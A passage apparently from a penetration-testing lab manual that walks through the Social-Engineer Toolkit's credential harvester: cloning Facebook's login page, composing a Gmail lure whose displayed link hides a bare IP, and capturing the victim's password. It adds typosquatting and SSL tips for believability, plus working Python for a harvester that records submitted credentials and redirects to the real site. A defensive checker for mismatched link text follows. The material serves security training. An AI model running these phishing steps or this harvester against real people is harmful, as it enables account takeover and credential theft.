    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com

FIGURE 3.8: Providing URL to be cloned

10. After cloning is completed, the highlighted message, as shown in the
following screenshot, will appear on the Terminal screen of SET. Press
Enter to continue.
11. It will start Credential Harvester.

If you're doing a penetration test, register a name that's similar to the victim's; for Gmail you could do gmai1.com (notice the 1), something similar that can mislead the user into thinking it's the legitimate

      99) Return to Webattack Menu
    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [!] I have read the above message.

    Press <return> to continue

FIGURE 3.9: SET Website Cloning

12. Leave the Credential Harvester Attack to fetch information from the
victim's machine.


When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com
    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [!] I have read the above message.

    Press <return> to continue

    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:

FIGURE 3.10: SET Credential Harvester Attack
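What the harvester started in Figure 3.10 actually does can be seen in a few dozen lines. The following is an added illustration written for this page, not SET's own code: it serves a stand-in for the cloned login page, records every field of every POST (SET's message above says it "captures all POSTs on a website"), and answers the POST with a redirect to the legitimate login page, which is why the victim ends up on the real site after clicking Log In. Assumptions: the redirect target is the URL SET reported cloning (https://login.facebook.com/login.php), the form field names and the HTML are constructed, the report is an in-memory list instead of SET's report file, and the server listens on 127.0.0.1:8080 rather than port 80 so it runs without root.

```python
# Added example (not SET's code): mechanics of a credential-harvester listener.
import json
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

LEGIT_LOGIN = "https://login.facebook.com/login.php"   # assumption: redirect target
CREDENTIAL_FIELDS = {"email", "user", "username", "login", "pass", "password"}

# Constructed stand-in for the cloned page. The only property that matters is
# that the form POSTs back to the harvester's own origin, which is what the
# clone does: the victim's browser talks to 10.0.0.15, not to Facebook.
CLONED_FORM = b"""<html><body>
<form method="POST" action="/login.php">
  Email: <input name="email"><br>
  Password: <input name="pass" type="password"><br>
  <input type="submit" value="Log In">
</form></body></html>"""

REPORT = []   # one dict per captured POST (stand-in for SET's harvester report)


def harvest(body: bytes, client_ip: str, path: str) -> dict:
    """Parse a form-encoded POST body, append it to REPORT and return the record.

    Every field is kept (the harvester captures all POSTs); the ones whose
    names look like credentials are also pulled out so the report is readable.
    """
    fields = {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}
    record = {
        "time": time.strftime("%Y-%m-%d %H:%M:%S"),
        "client": client_ip,
        "path": path,
        "fields": fields,
        "credentials": {k: v for k, v in fields.items() if k.lower() in CREDENTIAL_FIELDS},
    }
    REPORT.append(record)
    return record


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Step 19 of the lab: the victim is shown the replica of the login page.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(CLONED_FORM)

    def do_POST(self):
        # Step 20: the submission never logs anyone in. It is recorded and the
        # browser is bounced to the real login page with a 302, so the victim
        # simply sees the genuine form again and assumes a mistyped password.
        length = int(self.headers.get("Content-Length", "0"))
        record = harvest(self.rfile.read(length), self.client_address[0], self.path)
        print("[*] captured:", json.dumps(record))
        self.send_response(302)
        self.send_header("Location", LEGIT_LOGIN)
        self.end_headers()

    def log_message(self, *_):   # keep the console to captured data only
        pass


def serve(host: str = "127.0.0.1", port: int = 8080) -> HTTPServer:
    """Start the listener in a background thread and return the server object."""
    httpd = HTTPServer((host, port), HarvesterHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


if __name__ == "__main__":
    srv = serve()
    print("[*] Harvester listening on http://%s:%d" % srv.server_address)
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        srv.shutdown()
```

Run it, browse to http://127.0.0.1:8080/, submit the form, and the captured fields are printed while the browser lands on the real login page. The same three properties are what a defender looks for in proxy or mail-gateway logs: a login form whose action is a bare IP or a host other than the brand it imitates, a POST of credential-named fields to that host, and an immediate 302 from it to the legitimate login URL.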

13. Now, you have to send the IP address of your BackTrack machine to a
victim and trick him or her into clicking it to browse the IP address.
14. For this demo, launch your web browser in the BackTrack machine and
launch your favorite email service. In this example we have used
www.gmail.com. Log in to your Gmail account and compose an email.

Most of the time they won't even notice the IP, but it's just another way to ensure it goes on without a hitch. Once the victim enters the username and password in the fields, you will notice that we can intercept the credentials.

FIGURE 3.11: Composing email in Gmail

15. Place the cursor in the body of the email where you wish to place the
fake URL. Then, click the Link icon.

    [Screenshot: Gmail "Compose Mail" window in Mozilla Firefox on BackTrack Linux]
    Subject: TGIF - Party Pictures
    Body:    Hello Sam.
             Please click this link to view the weekend party pictures at TGIF
             with the celebrities.
             Regards.

FIGURE 3.12: Linking Fake URL to Actual URL

16. In the Edit Link window, first type the actual address in the Web
address field under the Link to option and then type the fake URL in
the Text to display field. In this example, the web address we have
used is http://10.0.0.15 and the text to display is
www.facebook.com/Rini TGIF. Click OK.

    [Screenshot: Gmail "Edit Link" dialog]
    Text to display: www.facebook.com/Rini TGIF
    Link to:  (o) Web address   ( ) Email address
    To what URL should this link go?
      http://10.0.0.15
    Not sure what to put in the box? First, find the page on the web that
    you want to link to. (A search engine might be useful.) Then, copy the
    web address from the box in your browser's address bar, and paste it
    into the box above.
    [OK]  [Cancel]

FIGURE 3.13: Edit Link window

17. The fake URL should appear in the email body, as shown in the
following screenshot.


    [Screenshot: Gmail "Compose Mail" window in Mozilla Firefox on BackTrack Linux]
    Subject: TGIF - Party Pictures
    Body:    Hello Sam.
             Please click this link www.facebook.com/Rini TGIF to view the
             weekend party pictures at TGIF with the celebrities.
             Regards.

FIGURE 3.14: Adding Fake URL in the email content

18. To verify that the fake URL is linked to the actual URL, click the fake
URL and it will display the actual URL as Go to link: with the actual
URL. Send the email to the intended user.

In some cases when you're performing an advanced social-engineering attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL-based attacks with SET. You will need to turn WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well, however there will be an "untrusted" warning when a victim goes to your website.

    [Screenshot: Gmail "Compose Mail" window in Mozilla Firefox on BackTrack Linux]
    Subject: TGIF - Party Pictures
    Body:    Please click this link www.facebook.com/Rini TGIF
             Go to link: http://10.0.0.15 - Change  Remove

FIGURE 3.15: Actual URL linked to Fake URL
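The email built in steps 15-18 has one property a mail gateway or an analyst can test for mechanically: the visible text names www.facebook.com while the href goes to a bare IP. The check below is an added example written for this page, not part of the lab or of SET. It parses the HTML of a message, collects every anchor, and flags those whose link text names a host that differs from the href's host, or whose href host is an IP literal. The sample message is constructed to mirror the lab's email (the second, benign link is added to show a non-match); the helper names are mine.

```python
# Added example (not from the lab or SET): flag anchors whose text and href disagree.
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# A hostname-looking token inside link text (e.g. "www.facebook.com/Rini TGIF").
HOSTNAME_RE = re.compile(r"(?i)\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b")

# Constructed sample that mirrors Figure 3.15; the mail.google.com link is a
# control that must not be flagged.
SAMPLE_EMAIL = """<html><body>
<p>Hello Sam.</p>
<p>Please click this link <a href="http://10.0.0.15">www.facebook.com/Rini TGIF</a>
to view the weekend party pictures at TGIF with the celebrities.</p>
<p>Regards.</p>
<p><a href="https://mail.google.com/">mail.google.com</a></p>
</body></html>"""


class _Anchors(HTMLParser):
    """Collect (href, visible text) for every <a> element in the document."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def _same_site(a: str, b: str) -> bool:
    # Treat a host and its subdomains as the same site (www.x.com vs x.com);
    # "facebook.com.attacker.example" does not pass because the suffix differs.
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_deceptive_links(html: str) -> list:
    """Return one dict per anchor whose visible text and href target disagree."""
    parser = _Anchors()
    parser.feed(html)
    parser.close()
    findings = []
    for href, text in parser.links:
        href_host = (urlsplit(href).hostname or "").lower()
        m = HOSTNAME_RE.search(text)
        text_host = m.group(1).lower() if m else None
        reasons = []
        if href_host and _is_ip(href_host):
            reasons.append("link target is a bare IP address")
        if text_host and href_host and not _same_site(text_host, href_host):
            reasons.append(f"text shows {text_host} but link goes to {href_host}")
        if reasons:
            findings.append({"href": href, "text": text, "href_host": href_host,
                             "text_host": text_host, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_deceptive_links(SAMPLE_EMAIL):
        print(f"{f['text']!r} -> {f['href']}: " + "; ".join(f["reasons"]))
```

On the sample it reports the facebook.com anchor twice over (IP target and host mismatch) and stays silent on the control link. It is the automated form of the hover check the lab describes: the user sees one host, the status bar shows another. Link text without a hostname ("click here") is deliberately not flagged, since there is nothing to compare against.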

19. When the victim clicks the URL, he or she will be presented with a
replica of Facebook.com.
20. The victim will be enticed to enter his or her user name and password
into the form fields as it appears to be a genuine website. When the
victim enters the Username and Password and clicks Log In, it does
not allow logging in; instead, it redirects to the legitimate Facebook
login page. Observe the URL in the browser.
